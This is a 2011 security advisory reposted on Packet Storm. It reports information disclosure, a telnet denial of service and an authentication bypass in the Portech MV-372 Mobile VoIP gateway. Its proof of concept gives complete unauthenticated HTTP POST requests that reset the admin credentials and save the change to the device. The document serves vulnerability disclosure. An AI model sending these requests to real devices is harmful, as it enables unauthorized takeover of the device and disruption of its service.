exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Portech MV-372 Denial Of Service / Bypass

Portech MV-372 Denial Of Service / Bypass
Posted Jul 4, 2011
Authored by Zsolt Imre

Portech MV-372 suffers from bypass, information disclosure, and denial of service vulnerabilities.

tags | exploit, denial of service, vulnerability, bypass, info disclosure
SHA-256 | fe74441412f01ba9f25f295d9fb618f22c3ae8d6714d665bf59bfe16788b2c36

Portech MV-372 Denial Of Service / Bypass

Change Mirror Download
Portech MV-372 Mobile VoIP Multiple Vulnerabilities

1. Description

Multiple vulnerabilities have been found in Portech MV-372 Mobile VoIP
Gateway which allows an attacker to compromise the device and/or initiate a
denial of service attack against it’s telnet service.
The ’Device details’ section contains information about the affected system.
Previous and future versions might be also vulnerable (not tested).

The vendor has been notified and aware of the issue but from their reply it
seems we will have to wait for a hotfix/patch for a while.

2. Device details

Mobile VoIP2 v9.092

Model Type: MV-372
Module Description: GSM:850/900/1800/1900MHz (SIM3x0)
Firmware Version: Mon Sep 6 13:11:30 2010.
Codec Version: Fri Mar 20 17:13:45 2009.
Contact Address: 150, Shiang-Shung N.Road., Taichung, Taiwan, R.O.C.
Tel: 886-4-23058000
Fax: 886-4-23022596
E-Mail: sales@portech.com.tw
Web Site: http://www.portech.com.tw.

3. Information disclosure

It is possible to access http://<device address>/info.htm without
authentication. This page reveals information about the device like model
type, module description, firmware and codec versions.

4. Telnet service remote denial of service vulneraility

It is possible to initiate a denial service attack against the telnet
service without authentication by providing a very long password (e.g.: >
5000 chars) at authentication. No valid username required.
As a result of the attack the telnet service crashes and will be unavailable
until the device is restarted.

5. Web Administration authentication bypass vulnerability

5.1 Description

An authetication bypass vulnerability exists in the web interface which
allows an attacker to modify the configuration of the device without
providing a valid username and password.
After a successful authentication we can see that our browser got no
cookie(s) from the device. After restarting the browser, deleting all stored
information or using private browsing we can still access the administrative
pages. When we change our IP address these pages are no longer accessible
and we are asked to log in. So, the device stores our IP address and uses it
as a session identifier. However this is a weakness, just like that the
application uses http protocol instead of https for authentication it also
fails to properly validate the user session.
The files with ’.htm’ extension are responsible for user interaction and
displaying configuration settings and the application is using CGI to handle
requested tasks like configuration-, username and password changes.
While the ’.htm’ pages verify our IP address, the CGI files not so calling
these files directly with the proper arguments will result in the execution
of the requested action without any authentication.

5.2 Proof of concept

To change the username and password of the device without authentication
send the following query to the device:

POST http://<device address>/change.cgi HTTP/1.1
Host: <device address>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/change.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 50

Nuser=admin&Npass=admin&Nrpass=admin&submit=Submit

The query above will change the actual username and password both to admin.
To apply the changes we have to save our configuration which can be done
with the query below. After executing the query the device restarts and we
can log in with the username ’admin’ and password ’admin’.

POST http://<device address>/save.cgi
Host: <device address>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/save.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

submit=Save

All other CGIs are also vulnerable.


Regards,
Zsolt Imre
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close